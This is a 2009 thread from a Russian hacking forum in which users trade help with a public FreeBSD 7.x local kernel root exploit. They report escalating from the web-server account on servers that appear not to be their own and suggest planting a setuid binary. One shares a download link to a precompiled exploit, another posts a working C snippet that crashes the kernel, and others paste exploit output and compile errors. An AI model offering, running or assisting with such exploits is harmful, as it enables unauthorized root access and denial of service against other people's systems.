Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Новый эксплоит в FreeBSD >= 7.0 (https://forum.antichat.xyz/showthread.php?t=113050)

k3rn3l 26.03.2009 10:58
Новый эксплоит в FreeBSD >= 7.0
 
Доброе времени суток

попроборвал протестить новый эксплоит bsd-ktimer.c
(http://www.securitylab.ru/poc/extra/370448.php)

было:uid=80(www) gid=80(www) groups=80(www)

стало:uid=80(www) gid=80(www) euid=0(root) groups=80(www)

возможно ли подняться дальше до (uid=0(root) gid=0(root)) если да, то как?

k3rn3l 26.03.2009 12:18
Цитата:
Сообщение от k3rn3l
Доброе времени суток

попроборвал протестить новый эксплоит bsd-ktimer.c
(http://www.securitylab.ru/poc/extra/370448.php)

было:uid=80(www) gid=80(www) groups=80(www)

стало:uid=80(www) gid=80(www) euid=0(root) groups=80(www)

возможно ли подняться дальше до (uid=0(root) gid=0(root)) если да, то как?
хотя впринципе есть доступ на чтение и запись файлов с правами 600

Ershik 26.03.2009 18:15
k3rn3l, насколько я понимаю. У тебя уже есть рут.
А за ссылку спасибо.

k3rn3l 27.03.2009 07:00
Цитата:
Сообщение от Ershik
k3rn3l, насколько я понимаю. У тебя уже есть рут.
А за ссылку спасибо.
ага, я уже и сам понял, что есть права рута, просто привычно лицезреть: uid=0(root) gid=0(root), а не

uid=80(www) gid=80(www) euid=0(root) groups=80(www)

смущают как то: uid=80(www) gid=80(www)

Iceangel_ 27.03.2009 07:27
я когда рутал этим сплоитом, тоже засмущался =)))
льешь суидник и сразу привычно становится =)

k3rn3l 27.03.2009 08:19
Цитата:
Сообщение от Iceangel_
льешь суидник и сразу привычно становится =)
если мона на этом месте поподробнее, как? что?

r0mka 29.03.2009 15:46
Подскажите, этот сплоит пойдёт под FreeBSD 6.2-RELEASE-p8?
Если нет, то скажите какой лучше эксплоит юзать под эту систему?

$n@ke 29.03.2009 16:06
r0mka, читай внимательн:
Новый эксплоит в FreeBSD >= 7.0
сочетание знаков > и = , означает : больше или равно, тоесть подвержены FreeBSD версии 7.0 и больше.
для 6,2 насколько я знаю - нет ничего. Так что только сервисы бажные, такие как sendmail ;-)

k3rn3l 30.03.2009 06:25
Цитата:
Сообщение от r0mka
Подскажите, этот сплоит пойдёт под FreeBSD 6.2-RELEASE-p8?
Если нет, то скажите какой лучше эксплоит юзать под эту систему?
вот посмотри для ентих версий:
FreeBSD 6.3, 6.4, 7.0
(http://www.securitylab.ru/vulnerability/365343.php)

estseo 05.07.2009 11:31
подскажите плиз, есть ли уже скомпилированный сплойт, скомпилить на том серваке не получается, команда gcc не выполняется, помогите плиз, я в асе 433397167

ph1l1ster 05.07.2009 11:39
Цитата:
Сообщение от estseo
подскажите плиз, есть ли уже скомпилированный сплойт, скомпилить на том серваке не получается, команда gcc не выполняется, помогите плиз, я в асе 433397167
Скомпилируй у себя, не вижу проблемы.

mr.gr33n 03.08.2009 05:30
Подскажите что делать, фряха 7.1, юзаю данный сплойт который в первом посте, вылетают ошибки при компиляции:
Код:
gcc 3.c -o xxx
3.c: In function 'main':
3.c:73: warning: cast from pointer to integer of different size
3.c:73: warning: cast from pointer to integer of different size
3.c:85: warning: cast from pointer to integer of different size
3.c:85: warning: cast from pointer to integer of different size
3.c:115: warning: cast from pointer to integer of different size
3.c:118: warning: cast from pointer to integer of different size
3.c:128:2: warning: no newline at end of file
/var/tmp//ccXPFf6W.s: Assembler messages:
/var/tmp//ccXPFf6W.s:12: Error: Incorrect register `%rax' used with `l' suffix
P.s. есть ли у кого скомпилированный бинарник?)

Twoster 03.08.2009 11:41
Цитата:
P.s. есть ли у кого скомпилированный бинарник?)
Получите, расспишитесь
http://letitbit.net/download/1961.c133f93f45bdc482dae143f79/bsd7.html

hacker4all 04.09.2009 02:58
ВНИМАНИЕ на серве работает хреново рута не дал но сервак убил )))

hacker4all 04.09.2009 03:17
Цель: FreeBSD 7.x
Воздействие: Отказ в обслуживании
Цитата:
/* FreeBSD 7.x Kernel panic when dumping environment, hacker4all*/
#include <kenv.h>
#include <stdio.h>
void main(){
kenv(KENV_DUMP,NULL,9090909090,9090909090);
}
результат был таким чем рут ))

не то ты че то суешь ))))

hacker4all 04.09.2009 03:22
ыы понимаю но 7.1 была... она ДОЛЖНА была пройти... по любому...

ps: сообщения выше было удаленно.

Ty3uK 07.09.2009 23:38
дабы не создавать новую тему у меня вопрос по данному експлоиту. скомпилировал, пытаюсь запустить. он запустился и вот что пишет
Код:
./test
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!

* allocated pointer page: 0x00000000 -> 0x08000000 [134217728-bytes]
* allocated itimer struct: 0x20000000 -> 0x200000DC [220-bytes]
* filling pointer page... ./test: failed to lookup posix_clocks
done
права у меня вот: uid=80(www) gid=80(www) groups=80(www)

pr[o]sta 15.11.2009 06:24
Ty3uK так же фигня на FreeBSD 7.0-RELEASE, сервак выпадает( подскажет может кто? критерии есть получается(


Время: 08:29